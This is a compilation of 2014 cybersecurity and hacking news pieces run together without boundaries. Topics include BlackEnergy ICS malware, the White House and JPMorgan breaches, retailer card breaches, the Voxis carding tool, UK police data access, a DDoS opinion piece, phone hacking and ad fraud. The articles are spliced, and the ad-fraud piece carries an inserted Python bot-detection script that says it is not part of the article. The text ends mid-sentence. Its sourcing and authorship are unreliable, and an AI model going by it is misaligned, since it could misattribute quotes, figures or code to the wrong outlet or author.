The US Department of Homeland Security Computer
Emergency Response Team (US-CERT) has warned that industrial control
systems (ICS) in the US have been compromised by the BlackEnergy malware
for at least two years.
The BlackEnergy family of malware is believed to be the same used in the cyber attack against Georgia in 2008.
It uses a malicious decoy document to hide its activities, making it easier for the hackers to mount follow-up attacks.
US-CERT said the malware campaign is sophisticated and "ongoing", and
attackers taking advantage of it have compromised unnamed ICS
operators, planting it on internet-facing human machine interfaces (HMI)
including those from GE Cimplicity, Advantech/Broadwin WebAccess, and
Siemens WinCC.
It is currently unknown whether other vendors' products have also been targeted, according to US-CERT.
"At this time, Industrial Control Systems-CERT has not identified any
attempts to damage, modify or otherwise disrupt the victim systems'
control processes," said the team in an alert.
"ICS-CERT has not been able to verify if the intruders expanded
access beyond the compromised HMI into the remainder of the underlying
control system.
"However, typical malware deployments have included modules that
search out any network-connected file shares and removable media for
additional lateral movement within the affected environment."
US-CERT describes the malware as "highly modular", and said that not all functionality is deployed to all victims.
An analysis run by the team identified the probable initial infection
vector for systems running GE's Cimplicity HMI with a direct connection
to the internet.
"Analysis of victim system artefacts has determined that the actors
have been exploiting a vulnerability (CVE-2014-0751) in GE's Cimplicity
HMI product since at least January 2012," the alert read.
On Monday, US-CERT also warned of attacks spreading the Dyre banking malware, which steals victims' credentials.
The department said that, since mid-October, a phishing campaign had
targeted "a wide variety of recipients", but elements, such as the
exploits, email themes, and claimed senders of the campaign, "vary from
target to target".
"A system infected with Dyre banking malware will attempt to harvest
credentials for online services, including banking services," the alert
warned.
T-Mobile's networks may have changed for the better — stronger
signal, faster speeds, better coverage — but what you probably didn't
know is that they're now even more secure.
In upgrading its U.S. networks, the fourth largest cellular giant in
the country also bolstered encryption in a number of cities, switching
to A5/3 encryption from the A5/1 standard on the older 2G networks,
which in some cases still carry calls or text messages when faster data
isn't available. Newer technologies, like 3G and 4G (LTE), already offer
significantly stronger encryption.
The Washington Post,
which first tested the networks in a number of cities, said New York,
Washington, and Boulder, Colorado are now using the newer standard,
covering tens of millions of customers.
Upgrading the network to the newer A5/3 encryption makes it
significantly harder to eavesdrop on calls and text messages. Even
the National Security Agency, which reportedly is able to decode the older, legacy A5/1 encryption, may face headaches with the new standard.
T-Mobile did not comment on the encryption.
In densely populated areas, such as the cities with enhanced
encryption, monitoring cellular calls becomes more difficult — simply
because of the volume of people. The call and text data is still routed
through ground networks, but filtering it becomes difficult. The Post
explained that an "IMSI catcher," which can identify an individual cell
subscriber, can make it easier to snoop on calls and texts without
having to crack the phone or network's encryption.
AT&T said it is already ramping up its encryption efforts by
offering A5/3 encryption, but tests by the Post found that in U.S. locations
where T-Mobile had upgraded, AT&T had not.
In any case, AT&T is shutting down its A5/1-encrypted 2G network by 2017, and replacing it with newer technology.
According to reports, an unclassified network was breached
A White House computer network has been breached by hackers, it has been reported.
The unclassified Executive Office of the President network was attacked, according to the Washington Post.
US authorities are reported to be investigating the breach, which was reported to officials by an ally of the US, sources said.
White House officials believe the attack was state-sponsored but are not saying what - if any - data was taken.
In a statement to the AFP news agency, the White House said "some elements of the unclassified network" had been affected.
A White House official, speaking on condition of anonymity, told the Washington Post: "In the course of assessing recent threats, we identified activity of concern on the unclassified EOP network.
"Any such activity is something we take very seriously. In
this case, we took immediate measures to evaluate and mitigate the
activity.
'State-sponsored'
"Certainly, a variety of actors find our networks to be
attractive targets and seek access to sensitive information. We are
still assessing the activity of concern."
The source said the attack was consistent with a
state-sponsored effort and Russia is thought by the US government to be
one of the most likely threats.
"On a regular basis, there are bad actors out there who are
attempting to achieve intrusions into our system," a second White House
official told the Washington Post.
"This is a constant battle for the government and our
sensitive government computer systems, so it's always a concern for us
that individuals are trying to compromise systems and get access to our
networks."
The Post quoted its sources as saying that the attack was
discovered two-to-three weeks ago. Some White House staff were
reportedly told to change their passwords and there was some disruption
to network services.
In a statement given to Agence France-Presse, a White House
official said the Executive Office of the President received daily
alerts concerning numerous possible cyber threats.
In the course of addressing the breach, some White House users were temporarily disconnected from the network.
"Our computers and systems have not been damaged, though some
elements of the unclassified network have been affected. The temporary
outages and loss of connectivity for our users is solely the result of
measures we have taken to defend our networks," the official said.
The US's National Security Agency, Federal Bureau of Investigation and Security Service were reportedly investigating.
Requests for comment were referred to the Department for
Homeland Security, a spokesman for which was not immediately available. A
White House spokesman has not responded to the BBC's request for
comment.
A new cybercrime tool promises to use credit card numbers in a more
human way that is less likely to attract the attention of
fraud-detection systems, and therefore be more lucrative for those who
seek to profit from events like the Target breach.
The "Voxis
Platform" is billed as "advanced cash out software" that promises to
help carders earn "astronomical amounts" of cash by faking human
interaction with different payment gateways, authors bragged in an ad posted around underground forums and to Bitcoin payments site Satoshibox.
The operator of the Voxis Team crime group, an entity known as
Bl4ckS14y3r, has claimed the platform can funnel cash through 32 payment
gateways without human interaction and automatically create fake
customer profiles to make the transfers less suspicious.
IntelCrawler
cybercrime investigator Andrew Komarov reported the software being
flogged by a Voxis Team member using the handle Conaco in October for
US$180.
"The sophisticated Voxis Platform provides the underground economy options for washing stolen credit cards," Komarov said.
"Taking
advantage of fraudulently obtained merchant accounts, bad actors can
use speed to automate and load cards to be charged for pre-determined
amounts at pre-determined times, all with the goal of sliding under
fraud detection systems.
"The emulation of human behaviour and buying patterns increases their probabilities of having charges authorised."
The Voxis Platform: a pretty UI, but is it more than carder phooey?
If the wares work as advertised it could help carders to do without money mules and stolen identities.
Supported payment gateways included Coinbase, Paypal, and WorldPay.
"Past
breaches of retailers like Target and Home Depot have created a demand
in the underground to quickly try and monetise the stolen cards,"
Komarov said. "Groups of cyber criminals actually pool their programming
resources to build tools like the Voxis Platform."
He said
IntelCrawler recommended processors bolster their know-your-customer
capabilities in respect to new merchant accounts and tighten transaction
scrubbing thresholds.
Voxis Team developers promised in the advertisement that the platform,
"so advanced" it was dubbed the 'fantastico Platform', would support
Amazon EC2 and tunnelling via proxy.
Sears Holdings Corp. (SHLD)’s Kmart
discount chain, the latest victim of hacker attacks on
retailers, said it detected a security breach this week and is
investigating the incident with law enforcement officials.
The retailer’s information-technology team identified the
breach on Oct. 9 and is working with a top security firm to
assess the incursion, which happened in early September, Kmart
said in a filing yesterday. Customer payment-card information
was probably exposed by the attack.
“According to the security experts Kmart has been working
with, the Kmart store payment data systems were infected with a
form of malware that was undetectable by current anti-virus
systems,” the company said. “Kmart was able to quickly remove
the malware. However, Kmart believes certain debit and credit
card numbers have been compromised.”
A wave of data breaches at companies including Home Depot
Inc. (HD), Target Corp. (TGT) and Neiman Marcus Group Ltd. have pressured
retailers to bolster database and credit-card processing
security. Nationwide concerns about cyber intrusions have
escalated after JPMorgan Chase & Co. (JPM) recently disclosed that an
attack by hackers exposed contact information of 76 million
households and 7 million small businesses.
Kmart said it doesn’t appear that personal information,
debit-card PINs, e-mail addresses or social security numbers
were obtained by the hackers. Howard Riefs, a spokesman, was
unable to provide the number of customers affected.
‘Advanced Software’
Kmart said in the statement that it’s working closely with
federal law enforcement authorities, banking partners and IT
security firms in the ongoing investigation and is “deploying
further advanced software to protect customers’ information.”
Home Depot’s data breach between April and September put
about 56 million payment cards at risk, the company said in
September. The hackers used custom-made software to evade
detection as they infiltrated computers at stores in the U.S.
and Canada, relying on tools that haven’t been seen in previous
attacks, according to the Atlanta-based home improvement
retailer.
The company began investigating the attack on Sept. 2,
immediately after banking partners and law enforcement raised
alarms that its systems may have been infiltrated. Home Depot
has said that while payment systems were hacked, there is no
evidence that debit-card PINs have been compromised.
Discount Chain
Target has recorded $146 million in expenses as of Aug. 2
related to the discount chain’s breach in which data for 40
million accounts were stolen. Part of the expenses include an
estimate on claims yet to be made by the credit card companies.
More than 100 lawsuits have been filed against Target
relating to the breach, which contributed to the ouster of Chief
Executive Officer Gregg Steinhafel in May. The chain also blamed
the attack, which became public in December, for a sales decline
in the fourth quarter.
Hackers also have attacked Supervalu Inc. (SVU) and AB
Acquisition LLC, the operator of the Albertsons supermarket
chain.
Shares of Sears, based in Hoffman Estates, Illinois, fell 6
percent to $24.78 at the close in New York yesterday, taking its
decline for the year to 38 percent.
The parent of Kmart is struggling to revive sales growth
and is unloading assets to generate cash after nine straight
quarters of losses.
British police have access to an automated data demand system, which
is regularly used to acquire data belonging to customers of three of the
four major UK mobile networks.
According to a report first published on Friday by The Guardian,
customer data is handed over "like a cash machine" to British police,
in many cases automatically and without the direct consent each time of
the phone companies.
EE, the company behind T-Mobile and Orange, along with Vodafone and
Three give police "click of a mouse" access to tens of millions of UK
mobile customers.
A fourth operator, O2, is the only major phone network requiring
staff to review police requests, the newspaper cited the company as
saying.
Although the system "mirrors" the US PRISM program, the name of the UK program is not known.
For more than a decade, every single mobile, cellular, and landline
operator in the UK has been obligated under British law, specifically
the Regulation of Investigatory Powers Act (RIPA), to store
communications data for up to two years. That includes calls made, when,
for how long, and to whom.
RIPA was introduced in 2000, pre-dating the mass surveillance effort in
the US that followed the September 11 attacks a year later. It is the UK's equivalent of the US Patriot Act and the Foreign Intelligence Surveillance Act (FISA), which can force a company to hand over data — often in secret — without public judicial oversight.
Such laws have been the basis of the modern-day UK-USA agreement,
which has been used to conduct surveillance on a massive scale — not
just on citizens but also governments, politicians, private companies, and journalists.
There is little oversight for RIPA, either. A senior police officer
must give the authority to access the UK's PRISM system, but in many
cases these can be conducted without any significant checks and balances
from the British courts.
But to date, it's believed that not a single UK mobile operator has
released figures showing how many data demands they are served each year
under British surveillance laws, either through RIPA, or through
warrants or court orders.
Vodafone, however, became the first UK operator to disclose that in some countries law enforcement has "direct access" to its networks. Thanks to the new report by The Guardian, that also includes the UK.
Earlier this year, the European Court of Justice struck down a crucial data retention law that
forced phone networks to store communications data, ruling it unlawful.
The data retention laws were critical for British police and
intelligence agencies to acquire this data. It took a matter of weeks
for the British parliament to create its own emergency data retention laws to allow the UK's PRISM program to continue.
"Without these capabilities we run the risk that murderers will not
get caught, terrorist plots will go undetected, drug traffickers will go
unchallenged, child abusers will not be stopped, and slave drivers will
continue in the appalling trade in human beings," UK Home Secretary
Theresa May said at the time.
One of the more recent concerns with US surveillance laws was the
allegation that there were "two versions" of the Patriot Act: one that
was written in the public law books, and a secret interpretation developed and used by the US Justice Department.
However, by contrast, RIPA is relatively straightforward and lays out
much of what British police and intelligence agencies can do.
The UK has been working to expand its snooping powers during the
Cameron-Clegg coalition administration, but failed due to
strong opposition. But in the Queen's Speech in 2013, the proposals to
widen the tracking of people's internet and phone activities were rekindled.
These proposals, although still in Home Office development, remain vastly under wraps.
To some people, a political mission matters more than anything,
including your rights. Such people (the Bolsheviks come to mind) have
caused a great deal of damage and suffering throughout history,
especially in the last 100 years or so. Now they're taking their mission
online. You better not get in their way.
Molly Sauter, a doctoral student at McGill University and a research affiliate at the Berkman Center at Harvard ("exploring cyberspace, sharing its study & pioneering its development"), has a paper calling the use of DDOS (distributed denial of service) attacks a legitimate form of activism and protest. This can't go unchallenged.
Sauter notes the severe penalties for DDOS attacks under "...Title 18, Section 1030 (a)(5) of the US Code,
otherwise known as the CFAA" (Computer Fraud and Abuse Act). This
section is short enough that I may as well quote it here verbatim:
(5)(A) [Whoever] knowingly causes the transmission of a
program, information, code, or command, and as a result of such conduct,
intentionally causes damage without authorization, to a protected
computer; (B) intentionally accesses a protected computer without
authorization, and as a result of such conduct, recklessly causes
damage; or (C) intentionally accesses a protected computer without authorization, and as a result of such conduct, causes damage and loss.
There are other problems with the CFAA with respect to some
legitimate security research and whether it technically falls afoul of
the act, but that's not the issue here.
Sauter goes on in some detail with the penalties under Federal law
for violating this act and, no argument here, they are extreme and
excessive. You can easily end up with many years in prison. This is, in
fact, a problem generally true of Federal law, the number of crimes
under which has grown insanely in the last 30 or so years, with the
penalties growing proportionately. For an informed and intelligent rant
on the problem I recommend Three Felonies a Day by Harvey Silverglate. Back to hacktivist DDOS attacks.
She cites cases of DDOS attacks committed against Koch Industries,
Paypal, the Church of Scientology and Lufthansa Airlines, some of these
by the hacktivists who call themselves Anonymous. In the US cases of the
attacks against Koch, Paypal and the Church, the attackers received
prison time and large fines and restitution payments. In the Lufthansa
case, in a German court, the attacker was sentenced to pay a fine or
serve 90 days in jail; that sentence was overturned on appeal. The court ruled that "...the online demonstration did not constitute a show of force but was intended to influence public opinion."
This is the sort of progressive opinion, dismissive of property
rights, that Sauter regrets is not happening here in the US. She notes,
and this makes sense to me, that the draconian penalties in the CFAA
induce guilty pleas from defendants, preventing the opportunity for a
Lufthansa-like precedent.
This is part and parcel of the same outrageous growth of Federal
criminal law I mentioned earlier; you'll find the same incentive to
plead guilty, even if you're just flat-out innocent, all over the US
Code. I would join Sauter in calling for some sanity in the sentencing
in the CFAA, but I part ways with her argument that political motives
are a mitigating, even excusing factor.
Sauter's logic rises from a foundation of anti-capitalism:
...it would appear that the online space is being or has
already been abdicated to a capitalist-commercial governance structure,
which happily merges the interests of corporate capitalism with those of
the post-9/11 security state while eliding democratic values of
political participation and protest, all in the name of 'stability.'
Once you determine that capitalism is illegitimate, respect for other
people's property rights is no longer a problem. Fortunately, the law
protects people against the likes of Anonymous and other anti-capitalist
heroes of the far left.
I would not have known or cared about Sauter's article had it not been for a favorable link to it by Bruce Schneier. Schneier is a Fellow at the Berkman Center.
Progressives and other leftists who think DDOS, i.e. impeding the
business of a person or entity with whom you disagree in order to make a
political point, is legitimate should consider the shoe on the other foot. If I
disagree with Schneier's positions is it cool for me to crash his web
site or those of other organizations with which he is affiliated, such
as the Berkman Center, the New America Foundation's Open Technology
Institute, the Electronic Frontier Foundation, the Electronic Privacy
Information Center and BT (formerly British Telecom)? I could apply the
same principle to anti-abortion protesters impeding access to a clinic.
I'm disappointed with Schneier for implying with his link that it's
legitimate to engage in DDOS attacks for political purposes.
It's worth repeating that Sauter has a point about the CFAA,
particularly with respect to the sentences. It does need to be
reformed — along with a large chunk of other Federal law. The point of
these laws is supposed to be to protect people against the offenses of
others, not to protect the offender.
The
closed captioning that we receive from CBS in New York for tonight's
episode of Blue Bloods was hacked and unfortunately contained profanity
and other statements that do not represent those of News 9 or CBS. We
sincerely apologize for this and the lack of captioning for our hearing
impaired viewers.
CBS is currently investigating and will implement steps to insure that this does not happen again.
A former News of the World news executive has admitted he was
involved in phone hacking, 16 months after pleading not guilty to the
crime in the Old Bailey.
Ian Edmondson’s about-turn marks the final chapter in the
phone-hacking trial that ended in June with the conviction of Andy
Coulson and the acquittal of Rebekah Brooks, both former News of the
World editors.
Edmondson, 45, spoke only to confirm his name and to say “guilty” when asked to formally enter his plea.
He was charged with conspiring to hack phones between 3 October 2000
and 9 August 2006 together with the paper’s former editor Andy Coulson
and with hacker Glenn Mulcaire, the paper’s former royal editor Clive
Goodman, its former newsdesk executives Greg Miskiw, Neville Thurlbeck
and James Weatherup, the paper’s former feature writer Dan Evans, and
other persons known and unknown.
Edmondson was one of the original eight defendants at the Old Bailey
trial but, for health reasons, was deemed “unfit” to continue on the
29th day of proceedings. He was deemed fit to stand trial in July.
Before he was released from trial, the jury heard how he was one of four news editors for whom convicted hacker Mulcaire worked.
Edmondson, who is now facing the possibility of jail, was bailed and will be sentenced at a date in November.
Edmondson’s barrister Sallie Bennet-Jenkins QC told the court that
Mulcaire had frequently “bragged” about hacking and Edmondson was aware
that this was one of the tools of his trade when tasking him.
She added, however, that Edmondson had been acting “under direct instructions by senior executives to use Mulcaire”.
Mark Bryant Heron QC, for the prosecution, told the court that
Edmondson was not the most prolific tasker of Mulcaire during the
six-year phone hacking conspiracy at the paper.
At one stage he even wanted to sack him, telling his bosses that the
£2,019 a week for “special investigations” being paid to Mulcaire’s Nine
Consultancy “had to stop”.
But, said the prosecutor, once Mulcaire’s previous handler Miskiw –
also a former news editor – left the paper, Edmondson became a
“frequent” tasker of the private investigator.
Between July 2005 and August 2006 records showed there were 800 calls and texts, or 90 a month, Bryant Heron said.
The court also heard for the first time of a tape recording of a
conversation between Edmondson and a News of the World colleague. The
tape was undated but from its contents it was evident the conversation
took place following the arrest of the royal editor Clive Goodman in
2006 on suspicion of phone hacking.
The colleague said: “But you know what the vital difference is you
haven’t done anything yourself or from your number. That is not what
Clive’s caught on, he’s fucking done it himself ...”
Edmondson replied: “Yeah – I’ve done it myself ...”
The prosecution said that Edmondson’s name was on 334 of the 8,000
notes seized from Mulcaire’s premises linking him to the hacking of
celebrities, politicians and sportspeople.
In addition to Lord Prescott, former culture secretary Tessa Jowell,
and Lord Freddie Windsor, targets linked to Edmondson’s instructions to
Mulcaire included Sienna Miller, her friend Archie Keswick and her
former boyfriend Jude Law, and George Best’s son Callum Best, the court
heard.
He also employed Mulcaire to investigate Sir Paul McCartney and Heather Mills in May 2006.
The NoW published nine articles about the couple over one
month, said Bryant Heron. “Ian Edmondson wished, unsurprisingly, to get
information on the marital break-up. He employed Mulcaire to do so.”
He told the court: “There was an aggressive newsgathering culture.
The end justified the means to get results, to get the story, in an
extremely competitive market.”
Edmondson worked for the paper in the 1990s, and then rejoined the
tabloid’s news desk in 2004, becoming news editor in 2005, a position he
held until he was suspended in December 2010 and subsequently dismissed
for gross misconduct in January 2011.
He was in charge when Mulcaire and the paper’s royal editor Clive Goodman were arrested in August 2006 on suspicion of hacking.
His suspension four years later came after three emails implicating
him in Mulcaire’s hacking came to light. These suggested that hacking
was not confined to Goodman, who the company had claimed was operating
as a single “rogue reporter” and led to the launch of Operation Weeting,
Scotland Yard’s phone-hacking investigation in January 2011.
They contained the mobile and pin numbers for Joan Hammell, a special
adviser to Lord Prescott, former culture secretary Tessa Jowell and
royal Freddie Windsor.
The jury heard that during Edmondson’s reign on the news desk the
paper also hacked rival journalists on the Mail on Sunday in an attempt
to discover what they knew about Prescott’s affair with his diary
secretary Tracey Temple in a “dog-eat-dog” fight for stories.
After the paper hacked Temple and her ex-husband and got nowhere, the
prosecution said that Edmondson then got hold of Hammell’s number and
passed it to Mulcaire. Mulcaire went on to get her pin and listened to
45 messages. He then emailed Edmondson telling him: “This is how you can
hack the phone so that you too can hear them”, according to emails
disclosed during the trial.
“In the dog-eat-dog world of journalism, in this frenzy to get the
huge story and to try to get something other than everybody else, that
is what you do, we suggest, if you are Ian Edmondson – you hack the
competition,” prosecutor Andrew Edis QC told jurors in his opening
speech.
One defendant had claimed that hacking was so widespread that
Edmondson was even accessing Coulson’s voicemail to find out which
stories he favoured.
When Mulcaire’s home was raided by police in 2006, officers
discovered a large cache of notes recording who had tasked him to hack
phones, including “Ian”.
His decision to plead guilty means that eight of the 10 so far
charged and dealt with for phone hacking at the NoW have been convicted
or pleaded guilty.
Before the trial got underway, Edmondson had sought disclosure of internal emails distancing himself from the work of Mulcaire.
He sought the emails to prove that he thought Mulcaire was
“inefficient” and “a waste of money” and wanted him sacked, and that
after he arrived at the NoW in November 2004 he cut down on the cash
payments.
Editor’s note: Noam Schwartz leads Business
Development at SimilarWeb. His previous company Tapdog was acquired by
SimilarWeb at the beginning of 2014.
Ad fraud is a well-known “secret” in the online marketing world, and
it’s been around ever since ads have existed on the Internet. Experts
estimate that for every $1 a company spends on online advertising,
almost half is lost to digital ad fraud.
But in 2014, ad fraud has taken center stage. This month the Interactive Advertising Bureau (IAB) released their “Anti-Fraud Principles,”
meant to reduce robotic traffic, or bots, and other forms of online
traffic fraud. And earlier this year, IAB chairman and Ziff Davis CEO
Vivek Shah publicly admitted that 36% of all web traffic is non-human traffic. (Other ad execs say it’s closer to 50%.)
What's more, the problem seems to be growing. Last year, Google disabled ads from more than 400,000 sites hiding malware, up from 123,000 sites in 2012.
Bots, Stuffing, and Stacking Scams
So how exactly do fraudsters hijack your marketing budget?
Unfortunately, there are a lot of ways to perpetrate traffic fraud,
including the following:
Clickjacking malware. This kind of malware sends real users to
websites they never planned to visit in the first place. Another method
is to have bots imitate real users by “clicking” on ads or repeatedly
loading a page.
iFrame stuffing. iFrame stuffing compresses an ad into a tiny
one-by-one pixel size. The ad is served up on a site as a real ad and
reported as a view, even though a real user would never be able to view
such a tiny ad.
Ad stacking. In this type of scam, multiple ads are placed on top
of each other in a single ad placement. Only the top ad is in view, but
all of the ads are reported as viewed.
These kinds of traffic fraud manipulate metrics like page views and
click-through rate, making cost-per-impression a dangerous pricing model
for advertisers.
To get an idea of just how dangerous it can be, let’s look at one of
the most elegant scams out there today, one that works using illegal bot
activity. To set up the scam, a fraudster could create a magazine-style
website for the sole purpose of hosting ads. Content is added
automatically from content farms or copied from real publishers.
Then, the fraudster distributes malicious software (or piggybacks on
existing ones), that causes the infected computers to open numerous
browser windows in the background, completely hidden from the user.
The browsers are directed to the fraudster’s fake webpage and emulate
human behavior by hopping from link to link, virtually moving the
cursor, scrolling, and occasionally clicking on ads.
Here you can see a video of illegal bots in action:
So here’s where advertisers take a hit in the marketing budget. Let’s
say that the fraudster manages to distribute malicious software to just
100,000 computers. If each of these computers opens 50 hidden browsers
every day, spending 30 seconds on each page and clicking an ad once
every 200 pages, the fraudster can generate 72 million fake clicks in a
single day! And advertisers are paying for every one of those clicks.
Online Ads Are Easy Targets
Online advertising is a fraudster’s heaven, and even the savviest advertisers lose millions of dollars each month.
So what makes ads so easy to target?
For one thing, advertisers often have no idea fraud has even
occurred. Typically, advertisers only get standard metrics on their ad
campaigns, like cost per lead and conversion rate. There’s no way to
detect ad fraud or to know just how much it cost you because it’s just
rolled into the cost of acquiring real customers.
Also, ad networks don’t ask a lot of questions when a new ad
publisher registers their site. Usually the ad network only asks for a
publisher’s basic traffic, engagement, and demographic stats, and that’s
it. Then the publisher gets the code that will allow them to present
ads from the ad network inventory. The ad networks have nothing to
lose—if the publisher generates clicks, it’s a win. If not, the ad
server will push the ads elsewhere.
Finally, those same ad networks actually benefit from ad fraud. They
get paid for each click or impression, regardless of whether the ad is
served to a real person or a fraudulent bot. So eliminating 36-50% of
those bad clicks would negatively affect their bottom line.
What Advertisers Can Do About Ad Fraud
Few substantial and scalable solutions exist for ad fraud.
Ad fraud detection companies such as Telemetry, Forensiq, White Ops,
Spider.io (recently acquired by Google), and SimilarWeb’s Traffic
Guardian use several approaches, including comparing visit patterns with
known behavior, monitoring malicious software, proxy unmasking, device
verification, and manipulation recognition.
For instance, an algorithm can decide whether a website's traffic is
legitimate or fraudulent by comparing how its visitors behave (dwell
time, navigation paths, click timing) with how real people behave on
comparable sites. Advertisers can view that data themselves, which
helps them decide whether one of their publishers needs to be
red-flagged, or even dropped immediately.
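To make the "compare visit patterns with known behavior" approach concrete, here is a small triage script. It is an added example, not code from the article or from any of the vendors named above; the hit log it runs on is constructed for the demo, and the thresholds (a dwell-time coefficient of variation below 0.10, more than 600 page views an hour, at least 10 page views before judging) are illustrative assumptions, not industry figures.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed hit log for the demo (not real traffic): one record per
# line, "visitor_id,epoch_seconds,event", where event is "page" for a
# page view or "click" for an ad click.
# bot-1 mimics the scheme above: a new page exactly every 30 s and an
# ad click every 10th page.
BOT1 = [f"bot-1,{1000 + 30 * i},page" for i in range(40)]
BOT1 += [f"bot-1,{1000 + 30 * i + 5},click" for i in range(0, 40, 10)]
# bot-2 jitters its page timer a little but is still metronomic.
BOT2, t = [], 5000
for gap in [28, 31, 29, 32] * 5:
    BOT2.append(f"bot-2,{t},page")
    t += gap
# human-1 reads at an irregular pace and clicks one ad.
HUMAN, t = [], 9000
for gap in [12, 45, 7, 130, 22, 60, 9, 300, 18, 40]:
    HUMAN.append(f"human-1,{t},page")
    t += gap
HUMAN.append("human-1,9100,click")
SAMPLE_HITS = "\n".join(BOT1 + BOT2 + HUMAN)


def parse_hits(text):
    """Group hits per visitor as time-sorted (timestamp, event) pairs."""
    by_visitor = defaultdict(list)
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        visitor, ts, event = line.split(",")
        by_visitor[visitor].append((int(ts), event))
    return {v: sorted(ev) for v, ev in by_visitor.items()}


def visit_features(events):
    """Summarise one visitor: volume, clicks, dwell-time regularity."""
    page_times = [ts for ts, ev in events if ev == "page"]
    clicks = sum(1 for _, ev in events if ev == "click")
    gaps = [b - a for a, b in zip(page_times, page_times[1:])]
    # Coefficient of variation of the time between page views: a script
    # on a timer gives roughly 0, a person gives something well above 0.5.
    dwell_cv = (pstdev(gaps) / mean(gaps)
                if len(gaps) >= 2 and mean(gaps) > 0 else None)
    span = page_times[-1] - page_times[0] if len(page_times) > 1 else 0
    pages_per_hour = len(page_times) * 3600 / span if span else 0.0
    return {"pages": len(page_times), "clicks": clicks,
            "dwell_cv": dwell_cv, "pages_per_hour": pages_per_hour}


def score_visitor(feat, max_dwell_cv=0.10, min_pages=10, max_pages_per_hour=600):
    """Reasons a visitor looks automated (empty list means clean).
    The thresholds are illustrative assumptions, not industry figures."""
    reasons = []
    if (feat["pages"] >= min_pages and feat["dwell_cv"] is not None
            and feat["dwell_cv"] < max_dwell_cv):
        reasons.append(f"metronomic dwell time (cv={feat['dwell_cv']:.3f})")
    if feat["pages_per_hour"] > max_pages_per_hour:
        reasons.append(f"{feat['pages_per_hour']:.0f} pages/hour")
    return reasons


def triage(text):
    """Map visitor id to its list of suspicion reasons for a whole hit log."""
    return {v: score_visitor(visit_features(ev))
            for v, ev in parse_hits(text).items()}


if __name__ == "__main__":
    for visitor, reasons in triage(SAMPLE_HITS).items():
        print(visitor, "BOT" if reasons else "ok", "; ".join(reasons))
```

Run it and bot-1 and bot-2 are flagged for their metronomic page timer while human-1 passes. The scheme above keeps the click-to-page ratio at a plausible one in 200 precisely so that click-through rate looks human, which is why the script ignores that ratio and scores timing and volume instead; keying sessions by client address rather than by browser instance would also expose the 50 hidden browsers on one machine through the volume check.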
Unfortunately, the online ad game will not be decided by a knockout.
New technologies and state-of-the-art algorithms are continually being
developed both by fraudsters and by those trying to fight them.
And while it’s promising that agencies and publishers have started
talking about the problem, advertisers have to be involved, too. After
all, they’re the ones with the most skin in the game.
A cyberattack this summer on JPMorgan Chase
compromised the accounts of 76 million households and seven million
small businesses, a tally that dwarfs previous estimates by the bank and
puts the intrusion among the largest ever.
The details of the breach — disclosed in a securities filing
on Thursday — emerge at a time when consumer confidence in the digital
operations of corporate America has already been shaken. Target, Home Depot
and a number of other retailers have sustained major data breaches.
Last year, the information of 40 million cardholders and 70 million
others was compromised at Target, while an attack at Home Depot in
September affected 56 million cards.
But unlike retailers,
JPMorgan, as the largest bank in the nation, has financial information
in its computer systems that goes beyond customers’ credit card details
and potentially includes more sensitive data.
“We’ve migrated so
much of our economy to computer networks because they are faster and
more efficient, but there are side effects,” said Dan Kaminsky, a
researcher who works as chief scientist at White Ops, a security
company.
Until just a few weeks
ago, executives at JPMorgan said they believed that only one million
accounts were affected, according to several people with knowledge of
the attacks.
As the severity of the intrusion, which began in June but was not
discovered until July, became clearer in recent days, bank executives
scrambled for the second time in three months to contain the fallout
and to reassure skittish customers that no money had been taken and
that their financial information remained secure.
The hackers appeared
to have obtained a list of the applications and programs that run on
JPMorgan’s computers — a road map of sorts — which they could crosscheck
with known vulnerabilities in each program and web application, in
search of an entry point back into the bank’s systems, according to
several people with knowledge of the results of the bank’s forensics
investigation, all of whom spoke on the condition of anonymity.
Operating overseas,
the hackers gained access to the names, addresses, phone numbers and
emails of JPMorgan account holders. In its regulatory filing on
Thursday, JPMorgan said that there was no evidence that account
information, including passwords or Social Security numbers, had been taken. The bank also noted that there was no evidence of fraud involving the use of customer information.
Still, until the
JPMorgan breach surfaced in July, banks were viewed as relatively safe
from online assaults because of their investment in defenses and trained
security staff. Most previous breaches at banks have involved stealing
personal identification numbers for A.T.M. accounts, not burrowing deep
into the internal workings of a bank’s computer systems.
Even if no customer
financial information was taken, the apparent breadth and depth of the
JPMorgan attack shows how vulnerable Wall Street institutions are to
cybercrime. In 2011, hackers broke into the systems of the Nasdaq stock market, but did not penetrate the part of the system that handles trades.
Jamie Dimon,
JPMorgan’s chairman and chief executive, has acknowledged the growing
digital threat. In his annual letter to shareholders, Mr. Dimon said,
“We’re making good progress on these and other efforts, but cyberattacks
are growing every day in strength and velocity across the globe.”
Even though the bank
has fortified its defenses against the attacks, Mr. Dimon wrote, the
battle is “continual and likely never-ending.”
On Thursday, some
lawmakers weighed in. Edward J. Markey, Democrat of Massachusetts and a
member of the Senate Commerce Committee, said “the data breach at
JPMorgan Chase is yet another example of how Americans’ most sensitive
personal information is in danger.”
Hackers drilled deep
into the bank’s vast computer systems, reaching more than 90 servers,
the people with knowledge of the investigation said. As they analyze the
contours of the breach, investigators in law enforcement remain
puzzled, partly because there is no evidence that the attackers looted
any money from customer accounts.
That lack of any apparent profit motive has generated speculation
among law enforcement officials and security experts that the hackers,
whom some thought to be from Southern Europe, may have been sponsored
by elements of the Russian government, the people with knowledge of
the investigation said.
By the time the bank’s
security team discovered the breach in late July, hackers had already
obtained the highest level of administrative privilege to dozens of the
bank’s computer servers, according to the people with knowledge of the
investigation. It is still unclear how hackers managed to gain such deep
access.
The people with
knowledge of the investigation said it would take months for the bank to
swap out its programs and applications and renegotiate licensing deals
with its technology suppliers, possibly giving the hackers time to mine
the bank’s systems for unpatched, or undiscovered, vulnerabilities that
would allow them re-entry into JPMorgan’s systems.
Beyond its
disclosures, JPMorgan did not comment on what its investigation had
found. Kristin Lemkau, a JPMorgan spokeswoman, said that describing the
bank’s breach as among the largest was “comparing apples and oranges.”
Preparing for the disclosure on Thursday, JPMorgan retained the law firm WilmerHale to help with its regulatory filing with the Securities and Exchange Commission,
people with knowledge of the matter said. Earlier on Thursday, some
executives, including Barry Sommers, the chief executive of Chase’s
consumer bank, flew back to New York from Naples, Fla., where they had
convened for a leadership conference, these people said.
The initial discovery of the hack sent chills down Wall Street and prompted an investigation by the Federal Bureau of Investigation. The bank was also forced to update its regulators, including the Federal Reserve, on the extent of the breach.
Faced with the rising
threat of online crime, JPMorgan has said it plans to spend $250 million
on digital security annually, but had been losing many of its security
